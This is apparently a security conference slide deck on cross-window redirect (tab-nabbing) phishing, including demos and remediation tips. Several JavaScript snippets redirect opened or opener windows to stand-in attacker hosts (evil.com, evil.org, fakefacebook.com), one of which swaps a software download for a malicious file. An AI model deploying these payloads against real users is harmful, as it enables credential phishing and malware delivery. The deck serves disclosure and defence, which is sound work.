This document summarizes cross-window redirects, a social engineering technique that exploits opened browser windows using JavaScript. It discusses two variants: child window redirects, where the opened child window redirects the parent, and parent window redirects, where the opened parent window is redirected by the child. It provides examples of how this technique can be used maliciously to redirect users to phishing pages from legitimate sites. The document recommends ways to mitigate this risk, such as not using window.open() to open links and verifying the window opener is trusted.
2. Who are we?
• Khaled Hawasli
– Manager Security Analysis @ HelpAG
• Michael Hendrickx
– Security Analyst @ HelpAG
3. Preface
• Social Engineering
becomes more
sophisticated
• People don’t fall for the
“click here” trick
– Receive email with link
– Click link
– Presented with login
screen
5. Cross-Window Redirect
• Exploiting opened windows using JS
• Unknowingly hyperlink redirections
• Works on all browsers
• 2 Variants:
– Child window redirect
– Parent window redirect
6. Child window redirect
• Control the link you just opened
Opens Gmail with
window.open()
Redirect to fake
phishing page
Parent Window
The attackers site
(controlling window)
Child Window
The targeted site
(controlled window)
childWindow = window.open(‘https://mail.google.com’);
childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’;
1
2
7. X-windows redirect demo
• Let’s get malware to users
– Let’s watch a movie
– We need a movie player
http://michaelhendrickx.com/misc/sf.html
8. X-windows redirect explained
• Link to SF to download software
– Rewrite the link before the countdown
sf = window.open(‘http://sourceforge.net/...’);
setTimeout(function(){
sf.location = ‘http://evil.org/nmap.tar.gz’;
}, 4000);
9. Multiple ways to attack this:
• setTimeout():
– Wait for a while and redirect the page.
• Interactive():
– Server polling using XHR
– Attacker can flip page on demand
• HTML5 Visibility API:
– Flip page when user is not looking
https://github.com/ndrix/xwindow-redirect
10. Parent Window Redirect
• “Evil child” can control the parent
1
Opens website with
window.open()
Child redirects
the parent
Parent Window
The targeted site
(controlled window)
Child Window
The
(co
window.open(‘http://mywebsite.com’);
window.opener = ‘http://evil.com/gmail/login.php’;
12. Parent window redirect: demo
• Emirates has some crazy deals!
<!DOCTYPE html>
<head><title>Crazy deals from
Emirates.com</title></head>
<body>
<img src="ek.jpg"/>
<script>
window.opener.location =
'http://fakefacebook.com’;
window.location =
'http://www.emirates.com/ae/…';
</script>
</body>
</html>
13. Parent window redirect: demo
• User may spend long enough on the target site,
believing that Facebook timed out.
Parent Window Child Window1. open child with window.open()
2. Redirect facebook to fake
“session logged out”
3. refresh itself to
legitimate site
14. Other sites that use window.open()
• Facebook, Amazon widget, …
• GMail schema.org
15. Remediation
• Don’t use window.open() to open hyperlinks
– Those links may control your page
• Verify if your page was opened from another
page
– if(window.opener && !window.opener.closed){
...
}
• Preferably, browsers should use X-Frame-
Options header for these JS links